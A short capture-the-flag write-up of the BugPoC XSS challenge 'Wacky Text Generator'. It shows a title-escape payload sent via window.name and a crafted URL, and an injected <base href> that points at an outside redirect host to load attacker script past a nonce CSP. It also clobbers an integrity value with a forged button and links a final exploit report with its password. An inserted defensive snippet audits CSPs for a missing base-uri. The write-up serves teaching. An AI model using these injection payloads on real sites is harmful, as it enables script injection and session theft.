BugPoC XSS CTF

The Wacky TeXt Generator

wacky.buggywebsite.com

Challenge

Setup

The Wacky Text Generator loads the processed text in an iframe.

Step 1: Title Escape

The value of param is copied into the page title, so the title element can be escaped.
The endpoint checks whether the window name is “iframe”.
window.name = "iframe";
window.location = "https://wacky.buggywebsite.com/frame.html?param=1337%3c%2ftitle%3e%3C/head%3E%3ch1%3eHello%20Content%3ch1%3e";

Step 2: Load Malicious Code

script-src 'nonce-kvduhtgrdywi' 'strict-dynamic'; frame-src 'self'; object-src 'none';
https://bugpoc.com/testers/other/redir
<base href="https://lg7tdq4rd5fc.redir.bugpoc.ninja/">
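A defensive check for the policy shown above, as an added example that is not part of the original write-up: the policy sets no base-uri, which is the condition that lets an injected <base> tag take effect. The function names and the hardened policy are assumptions made for this example.

```javascript
// Added example (not the challenge's code): audit a CSP for a missing base-uri.
// PAGE_POLICY is the policy quoted in Step 2; HARDENED_POLICY is constructed here.
const PAGE_POLICY =
  "script-src 'nonce-kvduhtgrdywi' 'strict-dynamic'; frame-src 'self'; object-src 'none';";
const HARDENED_POLICY = PAGE_POLICY + " base-uri 'none';";

// Parse a serialized policy into Map(directive name -> source list).
// Directive names are case-insensitive; a repeated directive is ignored (first wins).
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Return a list of findings about <base> handling; an empty list means no finding.
function auditBaseUri(policy) {
  const d = parseCsp(policy);
  const findings = [];
  // script-src falls back to default-src; base-uri has no such fallback.
  const scriptSrc = d.get('script-src') || d.get('default-src') || [];
  const trustPropagates = scriptSrc.some(
    (s) => /^'nonce-[^']+'$/i.test(s) || s.toLowerCase() === "'strict-dynamic'");
  const baseUri = d.get('base-uri');
  if (baseUri === undefined) {
    findings.push('base-uri is not set: an injected <base href> is unrestricted');
    if (trustPropagates) {
      findings.push('relative URLs loaded by nonce-trusted scripts follow the injected base');
    }
  } else if (baseUri.some((s) => s === '*' || /^https?:$/i.test(s))) {
    findings.push('base-uri allows arbitrary origins');
  }
  return findings;
}

console.log(auditBaseUri(PAGE_POLICY));
console.log(auditBaseUri(HARDENED_POLICY));
```

Adding base-uri 'none' (or 'self') to the policy clears both findings.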

Step 3: Integrity Check

<button id="fileIntegrity" name="fileIntegrity" type="submit" value="zhPJ/x4SM8T7tGc4VA8FonTCCb8dogeYrmjRZYzCbaI="></button>

Step 4: Execute JavaScript

My final solution that I uploaded to BugPoC
My final XSS exploit code
The final exploit as BugPoC report (https://bugpoc.com/poc#bp-znA8d6ul PW: ARIdboBcaT88)

Summary

Computer Science Student. Interested in IT security and forensics. https://fhantke.de/